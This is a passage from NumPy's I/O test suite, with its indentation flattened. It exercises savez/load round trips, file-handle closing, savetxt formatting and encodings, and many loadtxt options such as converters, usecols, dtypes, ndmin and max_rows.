assert_equal(arr.dtype, reloaded.dtype)
assert_equal(arr.flags.fnc, reloaded.flags.fnc)
finally:
# delete tempfile, must be done here on windows
if self.arr_reloaded.fid:
self.arr_reloaded.fid.close()
os.remove(self.arr_reloaded.fid.name)
@pytest.mark.skipif(not IS_64BIT, reason="Needs 64bit platform")
@pytest.mark.slow
def test_big_arrays(self):
L = (1 << 31) + 100000
a = np.empty(L, dtype=np.uint8)
with temppath(prefix="numpy_test_big_arrays_", suffix=".npz") as tmp:
np.savez(tmp, a=a)
del a
npfile = np.load(tmp)
a = npfile['a'] # Should succeed
npfile.close()
del a # Avoid pyflakes unused variable warning.
def test_multiple_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
self.roundtrip(a, b)
def test_named_arrays(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(a, l['file_a'])
assert_equal(b, l['file_b'])
def test_BagObj(self):
a = np.array([[1, 2], [3, 4]], float)
b = np.array([[1 + 2j, 2 + 7j], [3 - 6j, 4 + 12j]], complex)
c = BytesIO()
np.savez(c, file_a=a, file_b=b)
c.seek(0)
l = np.load(c)
assert_equal(sorted(dir(l.f)), ['file_a','file_b'])
assert_equal(a, l.f.file_a)
assert_equal(b, l.f.file_b)
def test_savez_filename_clashes(self):
# Test that issue #852 is fixed
# and savez functions in multithreaded environment
def writer(error_list):
with temppath(suffix='.npz') as tmp:
arr = np.random.randn(500, 500)
try:
np.savez(tmp, arr=arr)
except OSError as err:
error_list.append(err)
errors = []
threads = [threading.Thread(target=writer, args=(errors,))
for j in range(3)]
for t in threads:
t.start()
for t in threads:
t.join()
if errors:
raise AssertionError(errors)
def test_not_closing_opened_fid(self):
# Test that issue #2178 is fixed:
# verify could seek on 'loaded' file
with temppath(suffix='.npz') as tmp:
with open(tmp, 'wb') as fp:
np.savez(fp, data='LOVELY LOAD')
with open(tmp, 'rb', 10000) as fp:
fp.seek(0)
assert_(not fp.closed)
np.load(fp)['data']
# fp must not get closed by .load
assert_(not fp.closed)
fp.seek(0)
assert_(not fp.closed)
@pytest.mark.slow_pypy
def test_closing_fid(self):
# Test that issue #1517 (too many opened files) remains closed
# It might be a "weak" test since failed to get triggered on
# e.g. Debian sid of 2012 Jul 05 but was reported to
# trigger the failure on Ubuntu 10.04:
# http://projects.scipy.org/numpy/ticket/1517#comment:2
with temppath(suffix='.npz') as tmp:
np.savez(tmp, data='LOVELY LOAD')
# We need to check if the garbage collector can properly close
# numpy npz file returned by np.load when their reference count
# goes to zero. Python 3 running in debug mode raises a
# ResourceWarning when file closing is left to the garbage
# collector, so we catch the warnings.
with suppress_warnings() as sup:
sup.filter(ResourceWarning) # TODO: specify exact message
for i in range(1, 1025):
try:
np.load(tmp)["data"]
except Exception as e:
msg = "Failed to load data from a file: %s" % e
raise AssertionError(msg)
finally:
if IS_PYPY:
gc.collect()
def test_closing_zipfile_after_load(self):
# Check that zipfile owns file and can close it. This needs to
# pass a file name to load for the test. On windows failure will
        # cause a second error to be raised when the attempt to remove
# the open file is made.
prefix = 'numpy_test_closing_zipfile_after_load_'
with temppath(suffix='.npz', prefix=prefix) as tmp:
np.savez(tmp, lab='place holder')
data = np.load(tmp)
fp = data.zip.fp
data.close()
assert_(fp.closed)
class TestSaveTxt:
def test_array(self):
a = np.array([[1, 2], [3, 4]], float)
fmt = "%.18e"
c = BytesIO()
np.savetxt(c, a, fmt=fmt)
c.seek(0)
assert_equal(c.readlines(),
[asbytes((fmt + ' ' + fmt + '\n') % (1, 2)),
asbytes((fmt + ' ' + fmt + '\n') % (3, 4))])
a = np.array([[1, 2], [3, 4]], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_1D(self):
a = np.array([1, 2, 3, 4], int)
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'1\n', b'2\n', b'3\n', b'4\n'])
def test_0D_3D(self):
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, np.array(1))
assert_raises(ValueError, np.savetxt, c, np.array([[[1], [2]]]))
def test_structured(self):
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
c = BytesIO()
np.savetxt(c, a, fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 2\n', b'3 4\n'])
def test_structured_padded(self):
# gh-13297
a = np.array([(1, 2, 3),(4, 5, 6)], dtype=[
('foo', 'i4'), ('bar', 'i4'), ('baz', 'i4')
])
c = BytesIO()
np.savetxt(c, a[['foo', 'baz']], fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1 3\n', b'4 6\n'])
def test_multifield_view(self):
a = np.ones(1, dtype=[('x', 'i4'), ('y', 'i4'), ('z', 'f4')])
v = a[['x', 'z']]
with temppath(suffix='.npy') as path:
path = Path(path)
np.save(path, v)
data = np.load(path)
assert_array_equal(data, v)
def test_delimiter(self):
a = np.array([[1., 2.], [3., 4.]])
c = BytesIO()
np.savetxt(c, a, delimiter=',', fmt='%d')
c.seek(0)
assert_equal(c.readlines(), [b'1,2\n', b'3,4\n'])
def test_format(self):
a = np.array([(1, 2), (3, 4)])
c = BytesIO()
# Sequence of formats
np.savetxt(c, a, fmt=['%02d', '%3.1f'])
c.seek(0)
assert_equal(c.readlines(), [b'01 2.0\n', b'03 4.0\n'])
# A single multiformat string
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Specify delimiter, should be overridden
c = BytesIO()
np.savetxt(c, a, fmt='%02d : %3.1f', delimiter=',')
c.seek(0)
lines = c.readlines()
assert_equal(lines, [b'01 : 2.0\n', b'03 : 4.0\n'])
# Bad fmt, should raise a ValueError
c = BytesIO()
assert_raises(ValueError, np.savetxt, c, a, fmt=99)
def test_header_footer(self):
# Test the functionality of the header and footer keyword argument.
c = BytesIO()
a = np.array([(1, 2), (3, 4)], dtype=int)
test_header_footer = 'Test header / footer'
# Test the header keyword argument
np.savetxt(c, a, fmt='%1d', header=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('# ' + test_header_footer + '\n1 2\n3 4\n'))
# Test the footer keyword argument
c = BytesIO()
np.savetxt(c, a, fmt='%1d', footer=test_header_footer)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n# ' + test_header_footer + '\n'))
# Test the commentstr keyword argument used on the header
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
header=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes(commentstr + test_header_footer + '\n' + '1 2\n3 4\n'))
# Test the commentstr keyword argument used on the footer
c = BytesIO()
commentstr = '% '
np.savetxt(c, a, fmt='%1d',
footer=test_header_footer, comments=commentstr)
c.seek(0)
assert_equal(c.read(),
asbytes('1 2\n3 4\n' + commentstr + test_header_footer + '\n'))
def test_file_roundtrip(self):
with temppath() as name:
a = np.array([(1, 2), (3, 4)])
np.savetxt(name, a)
b = np.loadtxt(name)
assert_array_equal(a, b)
def test_complex_arrays(self):
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re + 1.0j * im
# One format only
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n',
b' ( +3.142e+00+ +2.718e+00j) ( +3.142e+00+ +2.718e+00j)\n'])
# One format for each real and imaginary part
c = BytesIO()
np.savetxt(c, a, fmt=' %+.3e' * 2 * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n',
b' +3.142e+00 +2.718e+00 +3.142e+00 +2.718e+00\n'])
# One format for each complex number
c = BytesIO()
np.savetxt(c, a, fmt=['(%.3e%+.3ej)'] * ncols)
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n',
b'(3.142e+00+2.718e+00j) (3.142e+00+2.718e+00j)\n'])
def test_complex_negative_exponent(self):
        # Prior to 1.15, some formats generated x+-yj, gh 7895
ncols = 2
nrows = 2
a = np.zeros((ncols, nrows), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.3e')
c.seek(0)
lines = c.readlines()
assert_equal(
lines,
[b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n',
b' (3.142e+00-2.718e+00j) (3.142e+00-2.718e+00j)\n'])
def test_custom_writer(self):
class CustomWriter(list):
def write(self, text):
self.extend(text.split(b'\n'))
w = CustomWriter()
a = np.array([(1, 2), (3, 4)])
np.savetxt(w, a)
b = np.loadtxt(w)
assert_array_equal(a, b)
def test_unicode(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
with tempdir() as tmpdir:
# set encoding as on windows it may not be unicode even on py3
np.savetxt(os.path.join(tmpdir, 'test.csv'), a, fmt=['%s'],
encoding='UTF-8')
def test_unicode_roundtrip(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
        # our gz wrapper supports encoding
suffixes = ['', '.gz']
if HAS_BZ2:
suffixes.append('.bz2')
if HAS_LZMA:
suffixes.extend(['.xz', '.lzma'])
with tempdir() as tmpdir:
for suffix in suffixes:
np.savetxt(os.path.join(tmpdir, 'test.csv' + suffix), a,
fmt=['%s'], encoding='UTF-16-LE')
b = np.loadtxt(os.path.join(tmpdir, 'test.csv' + suffix),
encoding='UTF-16-LE', dtype=np.unicode_)
assert_array_equal(a, b)
def test_unicode_bytestream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
s = BytesIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read().decode('UTF-8'), utf8 + '\n')
def test_unicode_stringstream(self):
utf8 = b'\xcf\x96'.decode('UTF-8')
a = np.array([utf8], dtype=np.unicode_)
s = StringIO()
np.savetxt(s, a, fmt=['%s'], encoding='UTF-8')
s.seek(0)
assert_equal(s.read(), utf8 + '\n')
@pytest.mark.parametrize("fmt", [u"%f", b"%f"])
@pytest.mark.parametrize("iotype", [StringIO, BytesIO])
def test_unicode_and_bytes_fmt(self, fmt, iotype):
# string type of fmt should not matter, see also gh-4053
a = np.array([1.])
s = iotype()
np.savetxt(s, a, fmt=fmt)
s.seek(0)
if iotype is StringIO:
assert_equal(s.read(), u"%f\n" % 1.)
else:
assert_equal(s.read(), b"%f\n" % 1.)
@pytest.mark.skipif(sys.platform=='win32', reason="files>4GB may not work")
@pytest.mark.slow
@requires_memory(free_bytes=7e9)
def test_large_zip(self):
def check_large_zip(memoryerror_raised):
memoryerror_raised.value = False
try:
# The test takes at least 6GB of memory, writes a file larger
# than 4GB. This tests the ``allowZip64`` kwarg to ``zipfile``
test_data = np.asarray([np.random.rand(
np.random.randint(50,100),4)
for i in range(800000)], dtype=object)
with tempdir() as tmpdir:
np.savez(os.path.join(tmpdir, 'test.npz'),
test_data=test_data)
except MemoryError:
memoryerror_raised.value = True
raise
# run in a subprocess to ensure memory is released on PyPy, see gh-15775
# Use an object in shared memory to re-raise the MemoryError exception
# in our process if needed, see gh-16889
memoryerror_raised = Value(c_bool)
p = Process(target=check_large_zip, args=(memoryerror_raised,))
p.start()
p.join()
if memoryerror_raised.value:
raise MemoryError("Child process raised a MemoryError exception")
# -9 indicates a SIGKILL, probably an OOM.
if p.exitcode == -9:
pytest.xfail("subprocess got a SIGKILL, apparently free memory was not sufficient")
assert p.exitcode == 0
class LoadTxtBase:
def check_compressed(self, fopen, suffixes):
# Test that we can load data from a compressed file
wanted = np.arange(6).reshape((2, 3))
linesep = ('\n', '\r\n', '\r')
for sep in linesep:
data = '0 1 2' + sep + '3 4 5'
for suffix in suffixes:
with temppath(suffix=suffix) as name:
with fopen(name, mode='wt', encoding='UTF-32-LE') as f:
f.write(data)
res = self.loadfunc(name, encoding='UTF-32-LE')
assert_array_equal(res, wanted)
with fopen(name, "rt", encoding='UTF-32-LE') as f:
res = self.loadfunc(f)
assert_array_equal(res, wanted)
def test_compressed_gzip(self):
self.check_compressed(gzip.open, ('.gz',))
@pytest.mark.skipif(not HAS_BZ2, reason="Needs bz2")
def test_compressed_bz2(self):
self.check_compressed(bz2.open, ('.bz2',))
@pytest.mark.skipif(not HAS_LZMA, reason="Needs lzma")
def test_compressed_lzma(self):
self.check_compressed(lzma.open, ('.xz', '.lzma'))
def test_encoding(self):
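# Test that an explicit encoding is honored when reading a file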
with temppath() as path:
with open(path, "wb") as f:
f.write('0.\n1.\n2.'.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16")
assert_array_equal(x, [0., 1., 2.])
def test_stringload(self):
# umlauts (non-ASCII characters)
nonascii = b'\xc3\xb6\xc3\xbc\xc3\xb6'.decode("UTF-8")
with temppath() as path:
with open(path, "wb") as f:
f.write(nonascii.encode("UTF-16"))
x = self.loadfunc(path, encoding="UTF-16", dtype=np.unicode_)
assert_array_equal(x, nonascii)
def test_binary_decode(self):
utf16 = b'\xff\xfeh\x04 \x00i\x04 \x00j\x04'
v = self.loadfunc(BytesIO(utf16), dtype=np.unicode_, encoding='UTF-16')
assert_array_equal(v, np.array(utf16.decode('UTF-16').split()))
def test_converters_decode(self):
# test converters that decode strings
c = TextIO()
c.write(b'\xcf\x96')
c.seek(0)
x = self.loadfunc(c, dtype=np.unicode_,
converters={0: lambda x: x.decode('UTF-8')})
a = np.array([b'\xcf\x96'.decode('UTF-8')])
assert_array_equal(x, a)
def test_converters_nodecode(self):
# test native string converters enabled by setting an encoding
utf8 = b'\xcf\x96'.decode('UTF-8')
with temppath() as path:
with io.open(path, 'wt', encoding='UTF-8') as f:
f.write(utf8)
x = self.loadfunc(path, dtype=np.unicode_,
converters={0: lambda x: x + 't'},
encoding='UTF-8')
a = np.array([utf8 + 't'])
assert_array_equal(x, a)
class TestLoadTxt(LoadTxtBase):
loadfunc = staticmethod(np.loadtxt)
def setup(self):
# lower chunksize for testing
self.orig_chunk = np.lib.npyio._loadtxt_chunksize
np.lib.npyio._loadtxt_chunksize = 1
def teardown(self):
np.lib.npyio._loadtxt_chunksize = self.orig_chunk
def test_record(self):
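# Test reading into a structured (record-like) dtype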
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=[('x', np.int32), ('y', np.int32)])
a = np.array([(1, 2), (3, 4)], dtype=[('x', 'i4'), ('y', 'i4')])
assert_array_equal(x, a)
d = TextIO()
d.write('M 64.0 75.0\nF 25.0 60.0')
d.seek(0)
mydescriptor = {'names': ('gender', 'age', 'weight'),
'formats': ('S1', 'i4', 'f4')}
b = np.array([('M', 64.0, 75.0),
('F', 25.0, 60.0)], dtype=mydescriptor)
y = np.loadtxt(d, dtype=mydescriptor)
assert_array_equal(y, b)
def test_array(self):
c = TextIO()
c.write('1 2\n3 4')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([[1, 2], [3, 4]], int)
assert_array_equal(x, a)
c.seek(0)
x = np.loadtxt(c, dtype=float)
a = np.array([[1, 2], [3, 4]], float)
assert_array_equal(x, a)
def test_1D(self):
c = TextIO()
c.write('1\n2\n3\n4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int)
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
c = TextIO()
c.write('1,2,3,4\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([1, 2, 3, 4], int)
assert_array_equal(x, a)
def test_missing(self):
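# Test handling an empty field via a per-column converter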
c = TextIO()
c.write('1,2,3,,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)})
a = np.array([1, 2, 3, -999, 5], int)
assert_array_equal(x, a)
def test_converters_with_usecols(self):
c = TextIO()
c.write('1,2,3,,5\n6,7,8,9,10\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
converters={3: lambda s: int(s or - 999)},
usecols=(1, 3,))
a = np.array([[2, -999], [7, 9]], int)
assert_array_equal(x, a)
def test_comments_unicode(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=u'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_byte(self):
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=b'#')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_comments_multiple(self):
c = TextIO()
c.write('# comment\n1,2,3\n@ comment2\n4,5,6 // comment3')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments=['#', '@', '//'])
a = np.array([[1, 2, 3], [4, 5, 6]], int)
assert_array_equal(x, a)
def test_comments_multi_chars(self):
c = TextIO()
c.write('/* comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
comments='/*')
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
# Check that '/*' is not transformed to ['/', '*']
c = TextIO()
c.write('*/ comment\n1,2,3,5\n')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, dtype=int, delimiter=',',
comments='/*')
def test_skiprows(self):
c = TextIO()
c.write('comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('# comment\n1,2,3,5\n')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_usecols(self):
a = np.array([[1, 2], [3, 4]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1,))
assert_array_equal(x, a[:, 1])
a = np.array([[1, 2, 3], [3, 4, 5]], float)
c = BytesIO()
np.savetxt(c, a)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(1, 2))
assert_array_equal(x, a[:, 1:])
# Testing with arrays instead of tuples.
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=np.array([1, 2]))
assert_array_equal(x, a[:, 1:])
# Testing with an integer instead of a sequence
for int_type in [int, np.int8, np.int16,
np.int32, np.int64, np.uint8, np.uint16,
np.uint32, np.uint64]:
to_read = int_type(1)
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=to_read)
assert_array_equal(x, a[:, 1])
# Testing with some crazy custom integer type
class CrazyInt:
def __index__(self):
return 1
crazy_int = CrazyInt()
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=crazy_int)
assert_array_equal(x, a[:, 1])
c.seek(0)
x = np.loadtxt(c, dtype=float, usecols=(crazy_int,))
assert_array_equal(x, a[:, 1])
# Checking with dtypes defined converters.
data = '''JOE 70.1 25.3
BOB 60.5 27.9
'''
c = TextIO(data)
names = ['stid', 'temp']
dtypes = ['S4', 'f8']
arr = np.loadtxt(c, usecols=(0, 2), dtype=list(zip(names, dtypes)))
assert_equal(arr['stid'], [b"JOE", b"BOB"])
assert_equal(arr['temp'], [25.3, 27.9])
# Testing non-ints in usecols
c.seek(0)
bogus_idx = 1.5
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=bogus_idx
)
assert_raises_regex(
TypeError,
'^usecols must be.*%s' % type(bogus_idx),
np.loadtxt, c, usecols=[0, bogus_idx, 0]
)
def test_fancy_dtype(self):
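# Test reading into a nested structured dtype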
c = TextIO()
c.write('1,2,3.0\n4,5,6.0\n')
c.seek(0)
dt = np.dtype([('x', int), ('y', [('t', int), ('s', float)])])
x = np.loadtxt(c, dtype=dt, delimiter=',')
a = np.array([(1, (2, 3.0)), (4, (5, 6.0))], dt)
assert_array_equal(x, a)
def test_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0, [[1, 2, 3], [4, 5, 6]])],
dtype=dt)
assert_array_equal(x, a)
def test_3d_shaped_dtype(self):
c = TextIO("aaaa 1.0 8.0 1 2 3 4 5 6 7 8 9 10 11 12")
dt = np.dtype([('name', 'S4'), ('x', float), ('y', float),
('block', int, (2, 2, 3))])
x = np.loadtxt(c, dtype=dt)
a = np.array([('aaaa', 1.0, 8.0,
[[[1, 2, 3], [4, 5, 6]], [[7, 8, 9], [10, 11, 12]]])],
dtype=dt)
assert_array_equal(x, a)
def test_str_dtype(self):
# see gh-8033
c = ["str1", "str2"]
for dt in (str, np.bytes_):
a = np.array(["str1", "str2"], dtype=dt)
x = np.loadtxt(c, dtype=dt)
assert_array_equal(x, a)
def test_empty_file(self):
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
c = TextIO()
x = np.loadtxt(c)
assert_equal(x.shape, (0,))
x = np.loadtxt(c, dtype=np.int64)
assert_equal(x.shape, (0,))
assert_(x.dtype == np.int64)
def test_unused_converter(self):
c = TextIO()
c.writelines(['1 21\n', '3 42\n'])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={0: lambda s: int(s, 16)})
assert_array_equal(data, [21, 42])
c.seek(0)
data = np.loadtxt(c, usecols=(1,),
converters={1: lambda s: int(s, 16)})
assert_array_equal(data, [33, 66])
def test_dtype_with_object(self):
# Test using an explicit dtype with an object
data = """ 1; 2001-01-01
2; 2002-01-31 """
ndtype = [('idx', int), ('code', object)]
func = lambda s: strptime(s.strip(), "%Y-%m-%d")
converters = {1: func}
test = np.loadtxt(TextIO(data), delimiter=";", dtype=ndtype,
converters=converters)
control = np.array(
[(1, datetime(2001, 1, 1)), (2, datetime(2002, 1, 31))],
dtype=ndtype)
assert_equal(test, control)
def test_uint64_type(self):
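# Test that large uint64 values are read without loss of precision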
tgt = (9223372043271415339, 9223372043271415853)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.uint64)
assert_equal(res, tgt)
def test_int64_type(self):
tgt = (-9223372036854775807, 9223372036854775807)
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=np.int64)
assert_equal(res, tgt)
def test_from_float_hex(self):
# IEEE doubles and floats only, otherwise the float32
# conversion may fail.
tgt = np.logspace(-10, 10, 5).astype(np.float32)
tgt = np.hstack((tgt, -tgt)).astype(float)
inp = '\n'.join(map(float.hex, tgt))
c = TextIO()
c.write(inp)
for dt in [float, np.float32]:
c.seek(0)
res = np.loadtxt(c, dtype=dt)
assert_equal(res, tgt, err_msg="%s" % dt)
def test_default_float_converter_no_default_hex_conversion(self):
"""
Ensure that fromhex is only used for values with the correct prefix and
is not called by default. Regression test related to gh-19598.
"""
c = TextIO("a b c")
with pytest.raises(
ValueError, match="could not convert string to float"
):
np.loadtxt(c)
def test_default_float_converter_exception(self):
"""
Ensure that the exception message raised during failed floating point
conversion is correct. Regression test related to gh-19598.
"""
c = TextIO("qrs tuv") # Invalid values for default float converter
with pytest.raises(
ValueError, match="could not convert string to float"
):
np.loadtxt(c)
def test_from_complex(self):
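# Test parsing complex numbers written in their default string form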
tgt = (complex(1, 1), complex(1, -1))
c = TextIO()
c.write("%s %s" % tgt)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, tgt)
def test_complex_misformatted(self):
# test for backward compatibility
# some complex formats used to generate x+-yj
a = np.zeros((2, 2), dtype=np.complex128)
re = np.pi
im = np.e
a[:] = re - 1.0j * im
c = BytesIO()
np.savetxt(c, a, fmt='%.16e')
c.seek(0)
txt = c.read()
c.seek(0)
# misformat the sign on the imaginary part, gh 7895
txt_bad = txt.replace(b'e+00-', b'e00+-')
assert_(txt_bad != txt)
c.write(txt_bad)
c.seek(0)
res = np.loadtxt(c, dtype=complex)
assert_equal(res, a)
def test_universal_newline(self):
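# Test that bare '\r' line endings are handled (universal newlines)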
with temppath() as name:
with open(name, 'w') as f:
f.write('1 21\r3 42\r')
data = np.loadtxt(name)
assert_array_equal(data, [[1, 21], [3, 42]])
def test_empty_field_after_tab(self):
c = TextIO()
c.write('1 \t2 \t3\tstart \n4\t5\t6\t \n7\t8\t9.5\t')
c.seek(0)
dt = {'names': ('x', 'y', 'z', 'comment'),
'formats': ('<i4', '<i4', '<f4', '|S8')}
x = np.loadtxt(c, dtype=dt, delimiter='\t')
a = np.array([b'start ', b' ', b''])
assert_array_equal(x['comment'], a)
def test_unpack_structured(self):
txt = TextIO("M 21 72\nF 35 58")
dt = {'names': ('a', 'b', 'c'), 'formats': ('|S1', '<i4', '<f4')}
a, b, c = np.loadtxt(txt, dtype=dt, unpack=True)
assert_(a.dtype.str == '|S1')
assert_(b.dtype.str == '<i4')
assert_(c.dtype.str == '<f4')
assert_array_equal(a, np.array([b'M', b'F']))
assert_array_equal(b, np.array([21, 35]))
assert_array_equal(c, np.array([72., 58.]))
def test_ndmin_keyword(self):
c = TextIO()
c.write('1,2,3\n4,5,6')
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=3)
c.seek(0)
assert_raises(ValueError, np.loadtxt, c, ndmin=1.5)
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',', ndmin=1)
a = np.array([[1, 2, 3], [4, 5, 6]])
assert_array_equal(x, a)
d = TextIO()
d.write('0,1,2')
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (1, 3))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
d.seek(0)
x = np.loadtxt(d, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
e = TextIO()
e.write('0\n1\n2')
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=2)
assert_(x.shape == (3, 1))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=1)
assert_(x.shape == (3,))
e.seek(0)
x = np.loadtxt(e, dtype=int, delimiter=',', ndmin=0)
assert_(x.shape == (3,))
# Test ndmin kw with empty file.
with suppress_warnings() as sup:
sup.filter(message="loadtxt: Empty input file:")
f = TextIO()
assert_(np.loadtxt(f, ndmin=2).shape == (0, 1,))
assert_(np.loadtxt(f, ndmin=1).shape == (0,))
def test_generator_source(self):
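# Test that an iterable of lines (here a generator) is accepted as input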
def count():
for i in range(10):
yield "%d" % i
res = np.loadtxt(count())
assert_array_equal(res, np.arange(10))
def test_bad_line(self):
c = TextIO()
c.write('1 2 3\n4 5 6\n2 3')
c.seek(0)
# Check for exception and that exception contains line number
assert_raises_regex(ValueError, "3", np.loadtxt, c)
def test_none_as_string(self):
# gh-5155, None should work as string when format demands it
c = TextIO()
c.write('100,foo,200\n300,None,400')
c.seek(0)
dt = np.dtype([('x', int), ('a', 'S10'), ('y', int)])
np.loadtxt(c, delimiter=',', dtype=dt, comments=None) # Should succeed
@pytest.mark.skipif(locale.getpreferredencoding() == 'ANSI_X3.4-1968',
reason="Wrong preferred encoding")
def test_binary_load(self):
butf8 = b"5,6,7,\xc3\x95scarscar\n\r15,2,3,hello\n\r"\
b"20,2,3,\xc3\x95scar\n\r"
sutf8 = butf8.decode("UTF-8").replace("\r", "").splitlines()
with temppath() as path:
with open(path, "wb") as f:
f.write(butf8)
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype=np.unicode_)
assert_array_equal(x, sutf8)
# test the broken latin1 conversion that people now rely on
with open(path, "rb") as f:
x = np.loadtxt(f, encoding="UTF-8", dtype="S")
x = [b'5,6,7,\xc3\x95scarscar', b'15,2,3,hello', b'20,2,3,\xc3\x95scar']
assert_array_equal(x, np.array(x, dtype="S"))
def test_max_rows(self):
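# Test that max_rows limits the number of data rows read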
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
def test_max_rows_with_skiprows(self):
c = TextIO()
c.write('comments\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=1)
a = np.array([1, 2, 3, 5], int)
assert_array_equal(x, a)
c = TextIO()
c.write('comment\n1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
skiprows=1, max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
def test_max_rows_with_read_continuation(self):
c = TextIO()
c.write('1,2,3,5\n4,5,7,8\n2,1,4,5')
c.seek(0)
x = np.loadtxt(c, dtype=int, delimiter=',',
max_rows=2)
a = np.array([[1, 2, 3, 5], [4, 5, 7, 8]], int)
assert_array_equal(x, a)
# test continuation
x = np.loadtxt(c, dtype=int, delimiter=',')
a = np.array([2,1,4,5], int)
assert_array_equal(x, a)
def test_max_rows_larger(self):
# Test max_rows greater than the number of rows
c = TextIO()
